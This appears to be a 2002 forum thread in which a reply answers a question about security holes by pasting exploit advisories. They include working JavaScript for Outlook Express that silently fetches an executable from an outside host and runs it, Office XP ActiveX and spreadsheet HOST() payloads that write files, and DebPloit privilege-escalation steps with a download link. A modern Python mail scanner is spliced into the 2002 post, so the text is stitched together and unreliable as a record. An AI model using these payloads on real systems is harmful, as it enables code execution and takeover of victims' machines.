lenk (Beginner)
8 April 2002 - 12:58 There are 3 comments and 3 solutions

Holes in the system

You often hear that there are security holes in systems and that various updates have been released to close those holes. I don't think I have ever read what these holes actually consist of and how they could be exploited by a potential hacker.

Isn't there some hacker expert who can describe a couple of holes or give a URL? They may well be old holes that have been closed. Just so I can see what it's all about.

Lenk....
Slater (Expert)
8 April 2002 - 13:00 #1
A hole can for example be the one that was in MS Outlook a short while ago.
It consisted of being able to send mails containing client-side script, set to execute immediately on the recipient's computer. You could then actually gain control of the recipient's computer just by him reading the mail.
jelzin101 (Trainee)
8 April 2002 - 13:00 #2
bufferzone (Trainee)
8 April 2002 - 13:00 #3
Well, I can certainly do that.
The following is clipped from my own "hole document" and concerns relatively new and "current" holes and exploits. Happy reading

"download&execution" of an .EXE file, directly from Outlook Express.


When an HTML page attached to a message is opened, it runs in the security zone of "\Temporary Internet Files" (TIF).

First: we can use the "dynsrc" trick of the IMG tag to download an .EXE from the web - silently - into the TIF zone. NOTE: if we use "src", the browser does not recognize the image format (because it's an executable) and downloads it only partially. Then - using JavaScript - we can get the local path of the "Temporary Internet Files" folder where the page was stored by Outlook Express and where the .EXE file will be downloaded.

NOTE: we must add "[1]" or "[2]" or "[x]" at the end of the .EXE filename, because IE renames temporarily downloaded files. Finally, using the ".innerHTML" exploit and knowing the exact path of the executable, we can run the .EXE file using this interesting trick:

 if we use a path which contains the string "\Temporary Internet Files", IE refuses to create the ActiveX object because of security restrictions and does not run the .EXE file;

 but if we use the old DOS path (c:\windows\tempor~1\content.ie5) instead of the long path (c:\windows\temporary internet files\content.ie5), IE is fooled and runs the .EXE file;

This is the JavaScript code for the HTML page (note: you must create an HTML file and attach it to the e-mail message; this code does not work when written directly inside the e-mail, the HTML page must be opened from Outlook Express).

The exploit is easy to create if the page and the executable have a similar name (for example EXPLOIT.HTML and EXPLOIT.EXE). The .EXE file must be uploaded to a web site beforehand.

NOTE: the exploit is not an "automatic execution" of the attachment; the victim must open the attached HTML page.

<HTML>
<SCRIPT LANGUAGE="JavaScript">
function runtimer()
{
//we must wait until .EXE file is copied to \Temporary Internet Files
timerID=setTimeout('runit()',7000)
}

function runit ()
{
  //catch local path of .EXE file
  var url = document.location.href;
  var path1=url.substring(8,url.length-5)+"[1].exe";
  //we need only the final path string
  //it starts from /Content.IE5/xxyyzz/
  i=0;
  var found=false;
  var path2="";
  while(i<path1.length) {
  if(path1.substring(i,i+2)=="/C") {found=true;}
  if(found) {path2=path2+path1.substring(i,i+1);}
  i++;
  }

  //this is the trick using dos name "Tempor~1" instead long names "Temporary Internet Files"
  path2="C:/WINDOWS/Tempor~1"+path2;
  alert("LOCAL PATH = "+path2);

  //finally run it with help of .innerHTML
  document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE='+path2+'></OBJECT>';
  }
</SCRIPT>
<body onLoad="runtimer()">
<center>
<h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>
<img src="_some_image.jpg" dynsrc="http://web.tiscali.it/funkybus/exploit.exe">
<hr>
<P>This page download (silently) an .EXE file using "IMG" tag
into "\Temporary Internet Files" folder, then locate the local path
of the .EXE using JavaScript and run it using .innerHtml exploit.</P>
<hr>
Exploit coded by Elia Florio
(eflorio@edmaster.it)
</center>
</body>
</html>

Vulnerabilities in Office XP.

1. It is possible to embed active content (object + script) in HTML mail which is triggered if the user chooses reply or forward on the mail. This opens an exploit scenario for forcing the user to visit a page in the Internet zone of IE at least.

2. There is a bug in the MS spreadsheet component, namely in its Host() function, which may be exploited with the help of (1) or probably from any document opened with an Office application. This buggy function allows creating files with arbitrary names, and their content may be specified to an extent which is sufficient to place an executable file (.hta) in the user's startup directory, which may lead to taking full control over the user's computer. This probably may be called cross-application scripting because one application uses an object from another application.


Details:
The following must be put in an HTML email which should be opened with Outlook XP, and the user should choose reply or forward.

1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random&lt;script&gt;while (42)
alert('HOHOHO\nTrying to sell trustworthy
computing\nHOHOHO')&lt;/script&gt;">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------


2.
The Office spreadsheet component is something like a mini Excel. It may be embedded in web pages (seems not exploitable) and in Office documents (seems exploitable).
It supports the Host() function, which returns the hosting object. So if you put the formula '=Host().SaveAs("name")' in a cell, a file with that name will be created.

[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="&lt;?xml version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#13;&#10;
xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10;
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;&#13;&#10;
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;&#13;&#10;
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&#13;&#10;
&lt;x:ExcelWorkbook&gt;&#13;&#10;
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13;&#10;
&lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10;
&lt;/x:ExcelWorkbook&gt;&#13;&#10; &lt;ss:Styles&gt;&#13;&#10; &lt;ss:Style
ss:ID=&quot;Default&quot;&gt;&#13;&#10; &lt;ss:Alignment
ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot;
ss:Vertical=&quot;Bottom&quot;&#13;&#10;
ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10;
&lt;ss:Borders&gt;&#13;&#10; &lt;/ss:Borders&gt;&#13;&#10; &lt;ss:Font
ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot;
ss:Color=&quot;Automatic&quot; ss:Bold=&quot;0&quot;&#13;&#10;
ss:Italic=&quot;0&quot;
ss:Underline=&quot;None&quot;/&gt;&#13;&#10; &lt;ss:Interior
ss:Color=&quot;Automatic&quot; ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;
&lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;&#13;&#10;
&lt;ss:Protection
ss:Protected=&quot;1&quot;/&gt;&#13;&#10; &lt;/ss:Style&gt;&#13;&#10;
&lt;/ss:Styles&gt;&#13;&#10; &lt;c:ComponentOptions&gt;&#13;&#10;
&lt;c:Label&gt;&#13;&#10; &lt;c:Caption&gt;Microsoft Office
Spreadsheet&lt;/c:Caption&gt;&#13;&#10;
&lt;/c:Label&gt;&#13;&#10; &lt;c:PreventPropBrowser/&gt;&#13;&#10;
&lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;
&lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;
&lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10;
&lt;/c:ComponentOptions&gt;&#13;&#10; &lt;x:WorkbookOptions&gt;&#13;&#10;
&lt;c:OWCVersion&gt;10.0.0.2621 &lt;/c:OWCVersion&gt;&#13;&#10;
&lt;x:DisableUndo/&gt;&#13;&#10; &lt;/x:WorkbookOptions&gt;&#13;&#10;
&lt;ss:Worksheet
ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10; &lt;x:Selected/&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;
&lt;c:WorksheetOptions&gt;&#13;&#10; &lt;/c:WorksheetOptions&gt;&#13;&#10;
&lt;ss:Table ss:ExpandedColumnCount=&quot;1&quot;
ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;
ss:DefaultColumnWidth=&quot;48.0&quot;
ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;
&lt;ss:Row&gt;&#13;&#10; &lt;ss:Cell
ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;&#13;&#10;
&lt;ss:Data ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10;
&lt;/ss:Cell&gt;&#13;&#10; &lt;/ss:Row&gt;&#13;&#10;
&lt;/ss:Table&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet
ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10; &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10; &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;o:DocumentProperties&gt;&#13;&#10;
&lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;
&lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;
&lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10;
&lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;
&lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;
&lt;/o:DocumentProperties&gt;&#13;&#10;
&lt;o:OfficeDocumentSettings&gt;&#13;&#10;
&lt;o:DownloadComponents/&gt;&#13;&#10;
&lt;o:LocationOfComponents HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;
&lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt;&#13;&#10;">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------

Workaround/Solution:
The solution is to get a real mail client and office applications. The workaround for this particular problem is:
For (1) - disable everything that contains "active" in IE.
For (2) - (have not tested it personally) deregister and delete the MS Office spreadsheet component

Vendor status:

Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.

Regards,
Georgi Guninski
http://www.guninski.com



Local security vulnerability in windows NT and Windows 2000

Radim "EliCZ" Picha (Bugs@EliCZ.cjb.net) discovered a vulnerability in Windows NT 4.0 and Windows 2000. He has written an exploit called DebPloit that shows the weakness of local Windows NT/2000 security and totally compromises the entire security subsystem.

DebPloit uses a hole in the NT/2000 debugging subsystem and allows ANY user with ANY privileges (even Guest and Restricted user) to execute processes in the security context of an administrator or the local system (SYSTEM) account.
In other words, any person who has access to the local computer can become an administrator and do everything he/she wants.


Principle: Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any process running on the local computer):

1. Become dbgss client (DbgUiConnectToDbg).

2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort). Everyone can access this port.

3. Ask dbgss to handle CreateProcess SsApi with Target's client id (ZwRequestPort).

4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT (WaitForDebugEvent). Message contains a duplicated handle.

5. Impersonate your security context using a duplicated handle.

6. Execute any code (e.g. run an external program) in the security context of Target.

Download DebPloit with a source code from
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip


To test your system for this vulnerability:

1. Download DebPloit.zip and unzip it to the directory on your hard drive.

2. Log off and log in again using the Guest (or any other non-administrative) account.

3. Run ERunAsX.exe from the command line and specify a program you wish to execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").

4. Your program now runs under the SYSTEM account and you can do everything (e.g. create a new user with administrative privileges) on the local computer.


HOTFIX

To close this hole and protect your computers and network against attacks from the inside, you can use an unofficial hotfix released by SmartLine, Inc.

DebPloitFix is a hotfix that closes the security hole used by the DebPloit exploit. DebPloitFix is implemented as a kernel mode driver that can be loaded dynamically (no need to restart your system). DebPloitFix assigns a new security descriptor to the DbgSsApiPort LPC port so that only the local system (SYSTEM user) will be able to access this port.

Download DebPloitFix with a source code from
http://www.smartline.ru/software/DebPloitFix.zip

For more information, please visit http://www.ntutility.com/freeware.html
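A defender's counterpart to the mail-borne tricks quoted in this post: an added example, not taken from any of the advisories above, that scans an HTML mail body for an IMG dynsrc pointing at an executable, for the two ActiveX CLSIDs quoted in the Office XP advisory, for a WebBrowser Location parameter carrying script, and for a spreadsheet XMLData formula calling HOST(). The sample mail and the example.invalid URL are constructed for this example.

```python
import re
from html.parser import HTMLParser

# CLSIDs quoted in the Office XP advisory: the WebBrowser control and the spreadsheet component
WEBBROWSER_CLSID = "8856F961-340A-11D0-A96B-00C04FD705A2"
SPREADSHEET_CLSID = "0002E551-0000-0000-C000-000000000046"


class MailScanner(HTMLParser):
    def __init__(self):
        super().__init__()  # attribute values arrive already unescaped (&lt; becomes <)
        self.findings = []
        self.clsid = None   # classid of the <object> we are currently inside, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "img" and a.get("dynsrc", "").lower().endswith(".exe"):
            self.findings.append("img dynsrc fetches an executable: " + a["dynsrc"])
        elif tag == "object":
            self.clsid = a.get("classid", "").upper().replace("CLSID:", "")
            if self.clsid in (WEBBROWSER_CLSID, SPREADSHEET_CLSID):
                self.findings.append("embedded ActiveX control " + self.clsid)
        elif tag == "param" and self.clsid is not None:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "location" and "<script" in value.lower():
                self.findings.append("WebBrowser Location parameter carries script")
            if name == "xmldata" and re.search(r"=\s*HOST\s*\(\)", value, re.I):
                self.findings.append("spreadsheet formula calls HOST()")

    def handle_endtag(self, tag):
        if tag == "object":
            self.clsid = None


def scan_html_mail(body):
    """Return the findings for one HTML mail body (an empty list means nothing matched)."""
    scanner = MailScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed sample mail combining the three patterns (not a real message; example.invalid is a placeholder)
SAMPLE_MAIL = """<html><body>
<img src="logo.jpg" dynsrc="http://example.invalid/payload.exe">
<object classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
 <param name="Location" value="about:x&lt;script&gt;alert(1)&lt;/script&gt;">
</object>
<object classid="CLSID:0002E551-0000-0000-C000-000000000046">
 <param name=XMLData value="&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\\x.hta&quot;)'/&gt;">
</object></body></html>"""
```

Running scan_html_mail(SAMPLE_MAIL) yields five findings in document order; a plain mail with ordinary images and no objects yields none.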
bufferzone (Trainee)
8 April 2002 - 13:44 #4
lenk (Beginner)
9 April 2002 - 11:26 #5
Thanks for the good answers, I will now try to hack myself.
jelzin101 (Trainee)
9 April 2002 - 11:37 #6
thanks for the pts :0)

//*Jelzin101
<ad>
www.dinos.dk - www.vojens.tk
</ad>